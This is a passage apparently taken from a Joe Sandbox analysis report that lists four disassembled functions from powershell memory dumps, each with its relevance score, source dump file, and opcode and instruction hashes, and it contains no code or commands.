                                                      • Instruction Fuzzy Hash: 10E17831E0DA8A4FEB99EB2858546B8BBE1EF457A0F1801BAD02DC71D3DF2C9841C355
                                                      Function 00007FF848F591FA Relevance: .4, Instructions: 433COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.3372692187.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ff848f50000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 00e350c5a4798bba94730558d209e68cfb26b5395088d78b379a950e35f0abf9
                                                      • Instruction ID: 0c245bb0b9c6c2c1f41d1a97886b22272e53f531aa329c1b10ebcd729b18a7ed
                                                      • Opcode Fuzzy Hash: 00e350c5a4798bba94730558d209e68cfb26b5395088d78b379a950e35f0abf9
                                                      • Instruction Fuzzy Hash: D3D12931E1EA8A5FEB9AAB2868155B5BBA0EF56394F0800FAD04CC75D3DF18AC05C355
                                                      Function 00007FF848E84AC2 Relevance: .3, Instructions: 342COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.3372363835.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ff848e80000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: aa69892333125c2f40da855afa35193d66ae8083330816a4a8b67248c9bc3130
                                                      • Instruction ID: e15b213f9bfdc17fad1c2d3fb4d95ada9263a6b0b92a012a23f3788e07fdd38b
                                                      • Opcode Fuzzy Hash: aa69892333125c2f40da855afa35193d66ae8083330816a4a8b67248c9bc3130
                                                      • Instruction Fuzzy Hash: 1EB16F31A08A4E8FEF98EF5CD485AADB7E1FFA8344F544169D409D7295CB34E881CB84
                                                      Function 00007FF848F567A7 Relevance: .2, Instructions: 150COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.3372692187.00007FF848F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F50000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ff848f50000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 289fc1950e8753a6137de61e66f88565fb89b9e0f30b89bb7f2080f4adede17f
                                                      • Instruction ID: aa03f772f0f60cb3d3124176303eeb5808ee47e608ad7a5d8d7932f160ec9562
                                                      • Opcode Fuzzy Hash: 289fc1950e8753a6137de61e66f88565fb89b9e0f30b89bb7f2080f4adede17f
                                                      • Instruction Fuzzy Hash: 3141F431D0EA8A4FF799A72858506B8ABE1EF467E0F6801F9D02DC71D3EF1C98448319
                                                      Function 00007FF848E83535 Relevance: .0, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.3372363835.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_7ff848e80000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                      • Instruction ID: 5f6525b4c40e49a8b224777401edeb9743f650b26be48d5259be4b959626fbe0
                                                      • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                      • Instruction Fuzzy Hash: EF01677111CB0C4FDB48EF0CE451AAAB7E0FB95364F50056DE58AC3651DB36E881CB45